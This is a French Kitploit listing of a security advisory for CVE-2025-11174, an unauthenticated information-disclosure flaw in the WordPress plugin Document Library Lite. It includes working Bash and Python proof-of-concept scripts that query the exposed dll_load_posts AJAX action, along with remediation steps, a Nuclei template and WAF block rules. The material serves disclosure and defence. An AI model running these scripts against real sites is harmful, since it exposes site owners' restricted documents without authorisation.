Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
Outils/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-11174 : Divulgation d'informations non authentifiée dans le plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Mots-clés : CVE-2025-11174, vulnérabilité Document Library Lite, divulgation d'informations, sécurité WordPress, exploit AJAX non authentifié, vulnérabilité de plugin WordPress, CWE-862, sécurité du plugin document WordPress, contournement d'autorisation, WordPress CVE 2025

Table des matières

  • Vue d'ensemble
  • Détails de la vulnérabilité
  • Analyse technique
  • Vecteur d'attaque
  • Preuve de concept
  • Guide de remédiation
  • Détection
  • Métriques CVSS
  • Références
  • Crédits
  • Contact sécurité

Vue d'ensemble

Vulnérabilité de divulgation d'informations du plugin WordPress Document Library Lite (CVE-2025-11174) - Faille de sécurité permettant un accès non authentifié à des données sensibles de documents dans le plugin de bibliothèque de documents WordPress.

Une vulnérabilité critique de contournement d'autorisation a été découverte dans le plugin WordPress Document Library Lite qui permet à des attaquants non authentifiés d'accéder à des informations sensibles sur les documents sans authentification appropriée.

Découvert par : Kai Aizen & Avraham Shemesh (SnailSploit)
Publié : 1er novembre 2025
Score CVSS : 5.3 (Moyen)
CWE : CWE-862 - Autorisation manquante
Plugin : Document Library Lite
Éditeur : Barn2 Plugins
Type d'attaque : Divulgation d'informations non authentifiée
Privilèges requis : Aucun (Attaque non authentifiée)

Détails de la vulnérabilité

Description

Le plugin Document Library Lite pour WordPress contient une vulnérabilité d'autorisation incorrecte dans toutes les versions jusqu'à la version 1.1.6 incluse. Le plugin expose une action AJAX non authentifiée dll_load_posts qui renvoie un tableau JSON des données des documents sans effectuer de vérifications de nonce ou de capacités.

Impact

Cette vulnérabilité permet à des attaquants non authentifiés de :

  • Accéder aux métadonnées des documents sans autorisation
  • Récupérer des listes de documents qui devraient être restreintes
  • Consulter des informations sur les documents destinées uniquement aux utilisateurs authentifiés
  • Énumérer les documents stockés dans la bibliothèque de documents

Note : Le score CVSS de 5.3 (gravité moyenne) reflète une divulgation d'informations limitée. Bien que la vulnérabilité permette un accès non authentifié aux données des documents, l'impact est évalué comme Faible pour la confidentialité, sans impact sur l'intégrité ou la disponibilité.

Versions affectées

  • Vulnérable : Toutes les versions ≤ 1.1.6
  • Corrigée : Version 1.1.7 et supérieures

Métriques CVSS v3.1

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Détail CVSS v3.1 :

  • Vecteur d'attaque (AV) : Réseau – La vulnérabilité peut être exploitée à distance via un réseau
  • Complexité de l'attaque (AC) : Faible – Aucune condition particulière n'est requise pour l'exploitation
  • Privilèges requis (PR) : Aucun – Aucune authentification ou privilège n'est requis
  • Interaction utilisateur (UI) : Aucune – L'exploit fonctionne sans aucune interaction utilisateur
  • Périmètre (S) : Inchangé – La vulnérabilité n'affecte que le composant vulnérable
  • Impact sur la confidentialité (C) : Faible – Divulgation d'informations limitée
  • Impact sur l'intégrité (I) : Aucun – Aucun impact sur l'intégrité
  • Impact sur la disponibilité (A) : Aucun – Aucun impact sur la disponibilité

Analyse technique

Cause racine de la vulnérabilité

L'action AJAX dll_load_posts est enregistrée sans vérification d'authentification ou d'autorisation appropriée :

root@kitploit:~
// Code vulnérable (simplifié)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

Le préfixe wp_ajax_nopriv_ indique que cette action est accessible aux utilisateurs non authentifiés, et la fonction de callback n'implémente pas :

  • Vérification de nonce
  • Vérification des capacités
  • Validation de l'authentification de l'utilisateur

Vecteur d'attaque

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

La vulnérabilité peut être exploitée via le point de terminaison admin-ajax.php de WordPress sans authentification.

Preuve de concept

⚠️ À des fins éducatives et de tests autorisés uniquement

PoC en Bash

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC en Python

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Remédiation

Pour les administrateurs de sites

Action immédiate requise :

  1. Mettez à jour le plugin Document Library Lite vers la version 1.1.7 ou supérieure immédiatement
  2. Examinez les journaux d'accès de votre site pour détecter des requêtes POST suspectes vers admin-ajax.php avec action=dll_load_posts
  3. Si vous ne pouvez pas mettre à jour immédiatement, envisagez de désactiver temporairement le plugin

Instructions de mise à jour

Via l'administration WordPress :

  1. Accédez à Plugins > Plugins installés dans l'administration WordPress
  2. Localisez "Document Library Lite"
  3. Cliquez sur Mettre à jour maintenant pour passer à la version 1.1.7 ou supérieure
  4. Vérifiez que la mise à jour a réussi

Avec WP-CLI :

root@kitploit:~
wp plugin update document-library-lite

Pour les développeurs de plugins

Assurez-vous que tous les gestionnaires AJAX implémentent des contrôles de sécurité appropriés :

root@kitploit:~
// Exemple de sécurité AJAX correcte
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Vérifier le nonce
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Nonce invalide');
    }
    
    // Vérifier les capacités
    if (!current_user_can('read')) {
        wp_send_json_error('Permissions insuffisantes');
        wp_die();
    }
    
    // Votre code sécurisé ici
}

Détection

Vérification du plugin WordPress

root@kitploit:~
# Vérifier si une version vulnérable est installée
wp plugin list | grep -i "document-library-lite"

Règles de scanner de sécurité

Modèle Nuclei :

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Règles de pare-feu applicatif web

Règle ModSecurity :

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Règle Nginx/OpenResty :

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

Chronologie

  • 1er novembre 2025 - Vulnérabilité divulguée publiquement
  • 1er novembre 2025 - Enregistrement du CVE publié
  • Novembre 2025 - Correctif publié (version 1.1.7)

Références

  • CVE-2025-11174 - CVE.org
  • Base de données d'avis GitHub
  • Wordfence Intelligence
  • Répertoire des plugins WordPress

Crédits

Chercheurs :

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

Processus de divulgation : Divulgation coordonnée

Avertissement

Ces informations sont fournies à des fins de recherche en sécurité et de défense uniquement. Toute exploitation de cette vulnérabilité à des fins malveillantes est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant de tester des systèmes que vous ne possédez pas.

Contact

Pour toute question ou information complémentaire sur cette vulnérabilité :

  • Email : [email protected]
  • Site web : snailsploit.com
  • Organisation : SnailSploit Security Research

Dernière mise à jour : 2 novembre 2025


📚 Documentation et auteur

L'article complet, la méthodologie et les recherches associées de ce projet se trouvent ici :

https://snailsploit.com/security-research/cves/cve-2025-11174/

Créé par Kai Aizen — chercheur indépendant en sécurité offensive.

snailsploit.com · Recherche · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Même attaque. Substrat différent.

Télécharger l’outil
MétriqueValeur
Vecteur d'attaqueRéseau (AV:N)
Complexité de l'attaqueFaible (AC:L)
Privilèges requisAucun (PR:N)
Interaction utilisateurAucune (UI:N)
PérimètreInchangé (S:U)
ConfidentialitéFaible (C:L)
IntégritéAucun (I:N)
DisponibilitéAucun (A:N)